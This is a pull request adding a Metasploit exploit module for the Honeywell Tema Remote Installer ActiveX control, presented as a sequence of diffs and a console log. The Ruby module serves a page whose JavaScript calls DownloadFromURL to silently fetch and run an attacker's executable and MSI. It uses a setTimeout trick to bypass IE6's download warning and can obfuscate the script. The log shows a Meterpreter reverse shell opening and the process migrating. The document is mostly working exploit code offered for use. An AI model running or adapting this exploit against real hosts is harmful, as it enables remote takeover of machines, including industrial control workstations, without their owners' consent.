### PR TITLE
Added module for OSVDB 76681

### DIFF
--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -12,18 +12,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE
-	include Msf::Exploit::Remote::BrowserAutopwn
-
-	autopwn_info({
-		:ua_name    => HttpClients::IE,
-		:ua_minver  => "6.0",
-		:ua_maxver  => "8.0",
-		:javascript => true,
-		:os_name    => OperatingSystems::WINDOWS,
-		:rank       => NormalRanking,
-		:classid    => "{E01DF79C-BE0C-4999-9B13-B5F7B2306E9B}",
-		:method     => "DownloadFromURL"
-	})
 
 	def initialize(info={})
 		super(update_info(info,

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -1,0 +1,161 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
+	include Msf::Exploit::FileDropper
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Honeywell Tema Remote Installer ActiveX Remote Code Execution",
+			'Description'    => %q{
+					This modules exploits a vulnerability found in the Honewell Tema ActiveX Remote
+				Installer.  This ActiveX control can be abused by using the DownloadFromURL()
+				function to install an arbitrary MSI from a remote location without checking source
+				authenticity or user notification. This module has been tested successfully with
+				the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Billy Rios', # Vulnerability discovery
+					'Terry McCorkle', # Vulnerability discovery
+					'juan vazquez'  # Metasploit
+				],
+			'References'     =>
+				[
+					[ 'OSVDB', '76681' ],
+					[ 'BID', '50078' ],
+					[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf' ]
+				],
+			'Payload'        =>
+				{
+					'Space'    => 2048,
+					'StackAdjustment' => -3500
+				},
+			'DefaultOptions'  =>
+				{
+					'EXITFUNC'         => "none",
+					'InitialAutoRunScript' => 'migrate -k -f'
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					# HoneyWell EBI R410.1 - TEMA 5.3.0
+					# Tema_RemoteInstaller.ocx 1.0.0.0
+					[ 'Automatic', {} ]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Oct 20 2011",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+			], self.class)
+	end
+
+	def exploit
+		@msi_name = rand_text_alpha(5 + rand(5)) + ".msi"
+		super
+	end
+
+	def on_new_session(session)
+		if session.type == "meterpreter"
+			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+		end
+
+		@dropped_files.delete_if do |file|
+			win_file = file.gsub("/", "\\\\")
+			if session.type == "meterpreter"
+				begin
+					wintemp = session.fs.file.expand_path("%WINDIR%")
+					win_file = "#{wintemp}\\Temp\\#{win_file}"
+					# Meterpreter should do this automatically as part of
+					# fs.file.rm().  Until that has been implemented, remove the
+					# read-only flag with a command.
+					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
+					session.fs.file.rm(win_file)
+					print_good("Deleted #{file}")
+					true
+				rescue ::Rex::Post::Meterpreter::RequestError
+					print_error("Failed to delete #{win_file}")
+					false
+				end
+
+			end
+		end
+
+	end
+
+	def on_request_uri(cli, request)
+		agent = request.headers['User-Agent']
+
+		if agent !~ /MSIE \d/ and agent !~ /Tema_RemoteInstaller/
+			print_error("Browser not supported: #{agent.to_s}")
+			send_not_found(cli)
+			return
+		end
+
+		# exec_payload.msi needs it to be named payload.exe
+		# atm there isn't msi generation on the fly
+		if request.uri =~ /payload\.exe$/
+			return if ((p=regenerate_payload(cli))==nil)
+			data = generate_payload_exe({:code=>p.encoded})
+			print_status("Sending payload")
+			send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
+			register_file_for_cleanup("payload.exe") unless @dropped_files and @dropped_files.include?("payload.exe")
+			return
+		end
+
+		if request.uri =~ /\.msi$/
+			msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
+			source = ::File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
+			print_status("Sending msi")
+			send_response(cli, source, {'Content-Type'=>'application/octet-stream'})
+			register_file_for_cleanup("#{@msi_name}") unless @dropped_files and @dropped_files.include?("#{@msi_name}")
+			return
+		end
+
+		# The 'setTimeout' trick allows to execute the installer even if the user doesn't click the popup
+		# warning when downloading the payload.
+		# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
+		js = <<-EOS
+		var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
+		setTimeout(function(){obj.DownloadFromURL('#{get_uri}/#{@msi_name}');},1000);
+		obj.DownloadFromURL('#{get_uri}/payload.exe');
+		EOS
+		js.gsub!(/\t\t/, "")
+
+		if datastore['OBFUSCATE']
+			js = ::Rex::Exploitation::JSObfu.new(js)
+			js.obfuscate
+		end
+
+
+		html = <<-EOS
+		<html>
+		<body>
+		</object>
+		<script>
+		#{js}
+		</script>
+		</body>
+		</html>
+		EOS
+
+		print_status("Sending html")
+		send_response(cli, html, {'Content-Type'=>'text/html'})
+
+	end
+
+end

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -13,6 +13,18 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE
 	include Msf::Exploit::FileDropper
+	include Msf::Exploit::Remote::BrowserAutopwn
+
+	autopwn_info({
+		:ua_name    => HttpClients::IE,
+		:ua_minver  => "6.0",
+		:ua_maxver  => "8.0",
+		:javascript => true,
+		:os_name    => OperatingSystems::WINDOWS,
+		:rank       => NormalRanking,
+		:classid    => "{E01DF79C-BE0C-4999-9B13-B5F7B2306E9B}",
+		:method     => "DownloadFromURL"
+	})
 
 	def initialize(info={})
 		super(update_info(info,

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE
-	include Msf::Exploit::FileDropper
 	include Msf::Exploit::Remote::BrowserAutopwn
 
 	autopwn_info({
@@ -77,12 +76,21 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class)
 	end
 
+	def exploit
+		@dropped_files = [
+			'payload.exe',
+			'ThinClient_TemaKit.msi',
+			'ThinClient_TemaKit.log'
+		]
+		super
+	end
+
 	def on_new_session(session)
 		if session.type == "meterpreter"
 			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
 		end
 
-		@dropped_files.delete_if do |file|
+		@dropped_files.each do |file|
 			win_file = file.gsub("/", "\\\\")
 			if session.type == "meterpreter"
 				begin
@@ -123,7 +131,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			data = generate_payload_exe({:code=>p.encoded})
 			print_status("Sending payload")
 			send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
-			register_file_for_cleanup("payload.exe") unless @dropped_files and @dropped_files.include?("payload.exe")
 			return
 		end
 
@@ -132,8 +139,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			source = ::File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
 			print_status("Sending msi")
 			send_response(cli, source, {'Content-Type'=>'application/octet-stream'})
-			register_file_for_cleanup("ThinClient_TemaKit.msi") unless @dropped_files and @dropped_files.include?("ThinClient_TemaKit.msi")
-			register_file_for_cleanup("ThinClient_TemaKit.log") unless @dropped_files and @dropped_files.include?("ThinClient_TemaKit.log")
 			return
 		end
 

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -22,7 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				Installer.  This ActiveX control can be abused by using the DownloadFromURL()
 				function to install an arbitrary MSI from a remote location without checking source
 				authenticity or user notification. This module has been tested successfully with
-				the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0.
+				the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and
+				Internet Explorer 6, 7 and 8 on Windows XP SP3.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -64,11 +65,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class)
 	end
 
-	def exploit
-		@msi_name = rand_text_alpha(5 + rand(5)) + ".msi"
-		super
-	end
-
 	def on_new_session(session)
 		if session.type == "meterpreter"
 			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
@@ -100,7 +96,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def on_request_uri(cli, request)
 		agent = request.headers['User-Agent']
 
-		if agent !~ /MSIE \d/ and agent !~ /Tema_RemoteInstaller/
+		# Windows 7 isn't normally supported because the user won't have write access to the
+		# %WINDIR%/Temp directory, where the downloaded components are stored.
+		if not (agent =~ /MSIE \d/ and agent =~ /NT 5\.1/) and agent !~ /Tema_RemoteInstaller/
 			print_error("Browser not supported: #{agent.to_s}")
 			send_not_found(cli)
 			return
@@ -122,25 +120,35 @@ class Metasploit3 < Msf::Exploit::Remote
 			source = ::File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
 			print_status("Sending msi")
 			send_response(cli, source, {'Content-Type'=>'application/octet-stream'})
-			register_file_for_cleanup("#{@msi_name}") unless @dropped_files and @dropped_files.include?("#{@msi_name}")
+			register_file_for_cleanup("ThinClient_TemaKit.msi") unless @dropped_files and @dropped_files.include?("ThinClient_TemaKit.msi")
+			register_file_for_cleanup("ThinClient_TemaKit.log") unless @dropped_files and @dropped_files.include?("ThinClient_TemaKit.log")
 			return
 		end
 
-		# The 'setTimeout' trick allows to execute the installer even if the user doesn't click the popup
-		# warning when downloading the payload.
-		# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
-		js = <<-EOS
-		var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
-		setTimeout(function(){obj.DownloadFromURL('#{get_uri}/#{@msi_name}');},1000);
-		obj.DownloadFromURL('#{get_uri}/payload.exe');
-		EOS
-		js.gsub!(/\t\t/, "")
+		if agent =~ /MSIE 6/
+			# The 'setTimeout' trick allows to execute the installer on IE6 even if the user
+			# doesn't click the warning popup when downloading the payload.
+			# The ThinClient_TemaKit.msi installer name must be static.
+			# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
+			js = <<-EOS
+			var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
+			setTimeout("obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');", 1000);
+			obj.DownloadFromURL('#{get_uri}/payload.exe');
+			EOS
+		else
+			js = <<-EOS
+			var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
+			obj.DownloadFromURL('#{get_uri}/payload.exe');
+			obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');
+			EOS
+		end
+
+		js.gsub!(/\t\t\t/, "")
 
 		if datastore['OBFUSCATE']
 			js = ::Rex::Exploitation::JSObfu.new(js)
 			js.obfuscate
 		end
-
 
 		html = <<-EOS
 		<html>


### PR DESCRIPTION
Tested successfully with the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and Internet Explorer 6, 7 and 8 on Windows XP SP3

<pre>
msf > use exploit/windows/browser/honeywell_tema_exec 
msf  exploit(honeywell_tema_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/LxE1xpjUGNyDnYg
msf  exploit(honeywell_tema_exec) > [*]  Local IP: http://192.168.1.128:8080/LxE1xpjUGNyDnYg
[*] Server started.
[*] 192.168.1.137    honeywell_tema_exec - Sending html
[*] 192.168.1.137    honeywell_tema_exec - Sending payload
[*] 192.168.1.137    honeywell_tema_exec - Sending msi
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.137:1168) at 2013-01-08 19:54:16 +0100
[-] Failed to delete C:\WINDOWS\Temp\payload.exe
[+] Deleted ThinClient_TemaKit.msi
[+] Deleted ThinClient_TemaKit.log
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.137:1168) processing InitialAutoRunScript 'migrate -k -f'
[*] Current server process: payload.exe (1740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2256
[+] Successfully migrated to process 
[*] Killing original process with PID 1740
[+] Successfully killed process with PID 1740


</pre>
